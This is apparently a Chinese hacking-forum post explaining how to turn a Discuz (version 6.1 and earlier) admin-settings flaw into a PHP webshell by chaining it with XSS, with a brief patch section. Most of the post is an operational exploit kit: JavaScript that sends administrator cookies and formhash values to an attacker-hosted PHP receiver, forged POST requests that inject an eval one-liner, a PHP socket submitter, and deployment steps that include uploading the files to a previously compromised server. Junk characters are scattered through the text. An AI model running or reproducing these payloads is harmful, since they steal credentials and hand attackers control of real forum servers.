Discuz XSS得webshell

admin

Discuz XSS得webshell
4 s9 v; C4 g' Y4 ?; t3 ]By racle @tian6.com
欢迎转帖.但请保留版权信息.
受影响版本iscuz<=6.1.0,gbk+utf+big5

新增加完全JS利用版本,只有一个文件.ajax-racle.js.有效版本提升至DZ6.1(理论上7.0版本都可以,但是6.1以上版本都已经默认打上补丁),新增浏览器版本判断,对方浏览器为IE或FIREFOX都有效.


9 A3 b7 Z+ Q2 h( r( Z  d8 T3天前有朋友在论坛问过,说Discuz有个非论坛创始人获得WEBSHELL的漏洞,是superhei早前发出来的一大堆DISCUZ漏洞之一.见原帖:http://bbs.tian6.com/redirect.ph ... 54794&ptid=8706
  {4 D. Y0 `2 S. _$ H% [+ k当时我说一会就弄出来给大家,但是实际上一接触,发现这个漏洞本身需要管理员后台权限,要广泛普遍的利用还是很复杂的,主要是以下几个问题,所以拖到今天才基本完工.
9 x2 e4 G7 u; I& u* F
分析和写EXP的过程中,得到t0by57,Superhei的大力帮助.他们PHP和JS都不错的哦!希望大家看这篇文章时,更注意分析和明白的过程,毕竟XSS是目前WEB安全的最大头戏.各种形式:XSIO,Cross Iframe Trick,crsf等等..
  L3 t3 q2 F$ ]) S: e' _本帖补充其中一个FLASH XSS应用方法:配合Discuz得shell-Flash XSS

6 H3 R) R2 P$ o8 H5 K  z: C0 E
8 j( Z3 N& z! w, w) p4 U: n----------------------------------------------------------前言分隔线-----------------------------------------------------------------------------

6 P2 S- W$ m9 |- i- m3 C$ }" X+ B- x
7 B: w7 ~" |9 h- \, [5 L$ qproblem1:漏洞页面runwizard.inc.php数据提交方式为post.需要模拟POST提交.

% @: m# H2 D  I2 U: Eproblem2ISCUZ论坛在数据提交的时候还验证了referer,因此还要伪造一下.php socket和js都可以伪造referer.
; G# a$ z% o7 @5 `
problem3:formhash()函数采用了用户名+密码+XXX的算法得出,程序本身没办法模拟算出来,于是又耗费了我一段时间,最终想到个傻办法,从源代码里读出来.呵呵.这里是参考了superhei的一个旧EXP想出来的.

+ k2 h5 H( i8 i
下面,我为大家简单说说这个漏洞的成因和补的办法.这里是有漏洞的文件代码:bbs/admin/runwizard.inc.php,里面有个函数function saverunwizardhistory() {
9 {4 b* q& {. n4 X
        global $runwizardfile, $runwizardhistory;

        $fp = fopen($runwizardfile, 'w');

! x  E. n6 d9 Y  K" ~* K        fwrite($fp, serialize($runwizardhistory));
0 F( G# ?+ F5 l5 j  {" z* E
7 @& _2 y; _5 x- N( C. z        fclose($fp);

, z8 S, o. h. X1 V}
复制代码serialize($runwizardhistory)直接就写进$fp里.runwizardhistory是什么呢?是论坛一些基本的配置信息,譬如论坛名.反应在论坛后台,位置是:discuz.com/bbs/admincp.php?action=runwizard&step=2.论坛名称,地址等三项信息都没任何过滤.该三项内容任何一项都可以直接写入一句话,提交,然后保存在缓存:bbs/forumdata/logs/runwizardlog.php里.
以下是修补的办法:function saverunwizardhistory() {
" S; h" l( C4 F, T( }( D
+ ~0 D% P8 d1 N( `1 ~+ p        global $runwizardfile, $runwizardhistory;

        $fp = fopen($runwizardfile, 'w');
( k7 n: H% w4 b  L% E
+ Q7 F5 k5 [7 D* [8 ?" W        $s = '<?php exit;?>';
/ F0 l  e$ Z$ B! L5 G$ V3 I8 X
        $s .= serialize($runwizardhistory);
! K# G5 ^' a# s- o, f0 T7 |
        fwrite($fp, $s);
9 ^+ X  A" |' k2 {
        fclose($fp);

}
! _' r, H( q4 S% @! e复制代码加写 '<?php exit;?>';到最前面,退出并且忽略该文件后面所有PHP代码.这么即使里面有一句话,也不能再被执行.


& o. ?1 `' {- i; {3 w
" R0 G; g1 d, q1 M* E. Z" g4 V----------------------------------------漏洞的成因和利用方法分隔线-----------------------------------------------------------------------------
6 \) i6 ]: o& t9 S+ h
  e" Y1 o. T: f5 v8 ~" q
  以上是该漏洞的成因和利用方法.大家看到这里,估计也认为这是个鸡肋漏洞了吧,首先要有管理员权限,有后台权限,然后才能上WEBSHELL,实话说,有后台权限,拿SHELL的办法也并不止这一个.所以这个洞的价值,看起来就不大了.当然,这个已经被发布的nday不是我本帖要讲的重点.这里我主要是想告诉大家,将XSS,Crsf和本漏洞联合起来的办法.这样该洞价值就大很多了.

3 t5 v% L  T2 S* ?* {- _- O0 L我们的思路是:论坛上有个xss点,Crsf flash(的确有,Discuz! member.php xss bug,Discuz! 数据库错误信息xss bug,Discuz! flash Crsf bug,Discuz! admincp.php xss bug,Discuz![flash] xss bug),管理员点击或浏览后,就执行了我们的JS,带他到外部一个JS中,通过JS获得他的COOKIES,获得他的HASH,然后经过外部一个PHP封装SOCKET以POST的形式提交前面说的动作,如果论坛没有补上该问题(目前没几个论坛补了.当然,天阳已经补了.^^),那么就会产生bbs/forumdata/logs/runwizardlog.php这个WEBSHELL.
7 I9 k# a1 Q6 s, j! N- r. k
这篇文章主要不是给大家个EXP,然后让大家拿着到处乱黑的,主要是讲方法,讲思路.因为这里学问不少.

首先我们要看,怎么通过JS,获得管理员COOKIES,然后把COOKIES传递给最终提交的PHP.获得的办法相信大家都知道,但是传递的办法,譬如以图片形式传递,就非常稳定和实用.是实现AJAX本地语言到服务器语言PHP的好办法.JS部分代码:
7 U+ H! F9 L, N  I5 p
var url="http://目标网站/admincp.php";      
. {3 i3 j  |/ ?
/*获得cookies*/

function getURL(s) {
0 p$ ^: B& I! _. G$ J8 _! ^0 u: c
var image = new Image();
$ M7 D+ Y: L) {' z( s. X) E4 B
7 }8 q) h) L0 ^. B- ?image.style.width = 0;

image.style.height = 0;

image.src = s;

}
8 f, Y2 A( h3 c% k' G
9 ]- O0 w. F/ |; G$ N8 _/ o/ AgetURL("我们做好的接收cookies的.php?x="+encodeURIComponent(document.cookie));  //这里就通过image变量传给了php
复制代码php以get方式接收过来的变量.$cookies=$_GET['x'];
7 r: e/ i0 R2 n  y" D8 @6 n3 D复制代码同理,hash我也是这么传到PHP里.不过HASH的获得方法也是很有意思的,众所周知,discuz有formhash来保护每个授权访问的唯一性.但是你也可以发现,在论坛页面用户退出的地方,引用了这个hash.我们要做的,就是从页面的源文件里搜索出hash,筛选出来,传递给PHP即可.筛选的办法很多,你有兴趣的话,可以看看我的筛选JS代码(而且这里discuz其实还留了一手,呵呵)
& W& q( A. J3 g' B  G* T6 A
6 u9 ~* Y2 R2 J
获得了cookies和hash以后,我们需要结合完整数据,做一次模拟提交,大家可以看看,这个是我之前写好的AJAX提交方式:var url="http://tian6.com/raclebbs/";
# a8 g9 F, W% T3 b; S4 I$ w


/*hash*/

# m( P! d' O5 }- I* b- cvar xmlHttpReq = new ActiveXObject("MSXML2.XMLHTTP.3.0");
  X' v3 }2 ^. ^
xmlHttpReq.open("GET", url+"admincp.php?action=home", false);
1 s2 `: p. z2 q
% E5 q, z+ J' a7 ]5 mxmlHttpReq.send();
; b2 P7 D+ f( {; K9 n
' j  b1 Q: m  c  j6 Z7 {var resource = xmlHttpReq.responseText;
- a9 Q8 C% O, C6 t
var numero = resource.search(/formhash/);

var formhash=encodeURIComponent(resource.substr(numero+17,8));
* a% c! t( g/ {& v3 M4 u, @

6 J9 r- \& n+ y
. Q3 u3 a: H9 M6 ~) z- Bvar post="formhash="+formhash+"&anchor=&settingsnew%5Bbbname%5D=1&settingsnew%5Bsitename%5D=<%3Fphp+eval(%24_POST[racle])%3F>racle%40tian6.com&settingsnew%5Bsiteurl%5D=http%3A%2F%2Fwww.comsenz.com%2F&step2submit=%E4%B8%8B%E4%B8%80%E6%AD%A5";//构造要携带的数据
0 }+ u, a+ K$ y6 J: W3 H  P, w
2 ^8 F1 J# {4 k3 W- nxmlHttpReq.open("OST",url+"admincp.php?action=runwizard&step=3",false);//使用POST方法打开一个到服务器的连接，以异步方式通信
3 A) }6 n0 P2 ~2 |
1 _6 z3 l9 @. c* `( LxmlHttpReq.setRequestHeader("Referer", url);
, F$ z2 W% F  a; L, ^: B
8 l) _6 z' w) LxmlHttpReq.setrequestheader("Accept","image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-powerpoint, application/vnd.ms-excel, application/msword, */*");
" K" b2 M- L+ k0 s  j8 l, W
xmlHttpReq.setrequestheader("content-length",post.length);

xmlHttpReq.setrequestheader("content-type","application/x-www-form-urlencoded");
" q. n* [& i# k
! I* \) \/ L$ }xmlHttpReq.send(post);//发送数据
7 f" C" p5 p  w6 i+ N8 }; E" F$ S复制代码这里HASH我假设正确,这样提交,也无须cookies
& m! o) ?; F8 d1 {4 u8 v0 {8 s
再看看以PHP SOCKET形式提交.$sock = fsockopen("$url", 80, $errno, $errstr, 30);
- j; b6 |/ _7 Q
$ H$ y) }& M+ y" H* bif (!$sock) die("$errstr ($errno)\n");
/ T/ M9 `5 p9 o8 O! ~, X" P! k
% w! w: \+ T. I0 l( s3 F" j! \( F$data = 'formhash='.$hash.'&anchor=&settingsnew%5Bbbname%5D=Discuz&settingsnew%5Bsitename%5D=<%3Fphp+eval(%24_POST[racle])%3F>racle%40tian6.com&settingsnew%5Bsiteurl%5D=http%3A%2F%2Fwww.comsenz.com%2F&step2submit=%E4%B8%8B%E4%B8%80%E6%AD%A5';

4 N/ f2 ?' G8 e, w/ \

fwrite($sock, "OST http://$url/admincp.php?action=runwizard&step=3 HTTP/1.1\r\n");

4 z3 K  c* d+ }fwrite($sock, "Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-powerpoint, application/vnd.ms-excel, application/msword, */*\r\n");
: n$ _) C# A2 S1 ?
fwrite($sock, "Referer: http://$url/admincp.php?action=runwizard&step=2\r\n");
% U( M8 G9 B0 k* q7 f0 F
: W7 X) T3 n# I# Lfwrite($sock, "Accept-Language: zh-cn\r\n");

fwrite($sock, "Content-Type: application/x-www-form-urlencoded\r\n");

! |8 @0 V. K; x6 d% V" Ofwrite($sock, "Accept-Encoding: gzip, deflate\r\n");
: M! {. p4 ]1 N* ]! M6 d
4 z% j- T5 s( o8 u- ~2 {0 Tfwrite($sock, "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; User-agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; http://bsalsa.com) ; User-agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; http://bsalsa.com) (Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)); .NET CLR 1.1.4322; .NET CLR 2.0.50727)\r\n");
+ U# W( s5 m% W( X
fwrite($sock, "Host: $url\r\n");

fwrite($sock, "Content-Length: ".strlen($data)."\r\n");
; B( M  E$ e5 R
# q& I+ n4 i* S' N: r1 Ofwrite($sock, "Connection: Keep-Alive\r\n");

fwrite($sock, "Cache-Control: no-cache\r\n");

! D$ L$ z. F% ]) t5 p# S  V5 G8 |7 yfwrite($sock, "Cookie:".$cookies."\r\n\r\n");
1 X" R# ^: w# ^# p
fwrite($sock, $data);

8 h: J: N9 ~; s! j" u/ H
( v$ U; _* Z$ j3 x' L1 L
9 C$ d$ r* N, k+ P. T$headers = "";

5 b3 o* ^/ j/ r+ B+ Q3 s! N  ?$ hwhile ($str = trim(fgets($sock, 4096)))

( A9 J3 l# |& @- m$ q     $headers .= "$str\n";

echo "\n";

$body = "";

while (!feof($sock))

! c/ T% f. z7 M' W) b* [5 s     $body .= fgets($sock, 4096);
, N, a; P  i2 i5 P/ ~& \
fclose($sock);
# g) z5 z+ g5 U* K& o! A
1 s' M6 T8 @5 P1 D% t0 y( _echo $body;
复制代码整个漏洞XSS应用大致如此,下面附上JS文件,PHP封装好的提交文件.利用文件限制一下,已注册用户才可以下载,刚来也没关系,仔细看看前面的分析,你也差不多能写出来.^^

! w- O$ s# O6 I5 Q  ~7 X
% N7 @. s' u$ G-------------------------------------------XSS文件分析分隔线-----------------------------------------------------------------------------
" K, X3 `# D: y8 g! |
% J7 f! p7 D1 B# Y6 [2 V
  J% f! B4 G7 B2 M7 [, J1HP SOCKET利用方法首先打开racle.js

var url="http://tian6.com/raclebbs/admincp.php?action=home"; //改成你要XSS攻击的目标,譬如http://www.discuz.com/admincp.php?action=home
5 w/ s, @! i# q3 N$ r) w) {

" {  t4 j6 o  C+ w
然后打开racle@tian6.php

" P5 ~9 M* p, a$ y$ m% A$url="racle@tian6.com";   //改成你要XSS攻击的目标,譬如www.discuz.com

0 Q  O4 D  ]1 o( c* c7 t
0 n) S+ |7 K2 \, B
如果目标论坛为6.1版本,无须再改动.如果目标为6.0或以下版本,请修改:
9 H" O) c9 y/ d7 O5 M, y
  F6 s5 Y6 w% [. l6 F- _getURL("racle@tian6.php?resource_hash="+encodeURIComponent(resource.substr(numero+17,8))+"&x="+encodeURIComponent(document.cookie));
7 o0 H) I- o  F4 A
为

& [5 K8 n! l+ m- q! C5 m) T+ |- _getURL("racle@tian6.php?resource_hash="+encodeURIComponent(resource.substr(numero+9,8))+"&x="+encodeURIComponent(document.cookie));
复制代码2:JS利用方法打开ajax-racle.js,修改var url="http://tian6.com/raclebbs/";为你要攻击的论坛地址.



' Z* v  R$ D- _+ }如果目标论坛为6.1版本,无须再改动.如果目标为6.0或以下版本,请修改:

var formhash=encodeURIComponent(resource.substr(numero+17,8));

为
1 }. R# p* o% h1 q/ f! d3 D5 U
  Q# c& i* U* o  h7 `2 W# Mvar formhash=encodeURIComponent(resource.substr(numero+9,8));
复制代码ok.以上两种方法则其一.在攻击前,我们应该先看看论坛打上补丁没有,你可以尝试访问:http://target.com/bbs/forumdata/logs/runwizardlog.php,如果一片空白,那就没戏咯.不是空白就会有些论坛信息出现,但也不代表就肯定存在漏洞,因为可能人家补过之后没有更新过论坛信息而已.目前来说,有8成把握吧.
" e1 V  X) w5 P; \& q4 t
如果是第一种方法,就把racle.js,还有racle@tian6.php文件上传到一个可以执行PHP的地方,譬如你以前拿下的WEBSHELL里.两个文件需在同一目录下.记得该空间要支持PHP.然后在论坛以<script src=http://你放好的地方/racle.js></script>构造好XSS点.

如果是第二种方法,就把ajax-racle.js,上传到一个你以前拿下的WEBSHELL里,然后在论坛以<script src=http://你放好的地方/ajax-racle.js></script>构造好XSS点.

不管你用什么方法,等到管理员一点该连接或者浏览一下论坛,他论坛bbs/forumdata/logs/runwizardlog.php里就多了个<?php eval($_POST[racle])?> ^^.赶紧拿控制端连上去吧.
/ r' g2 ]1 i0 ^+ B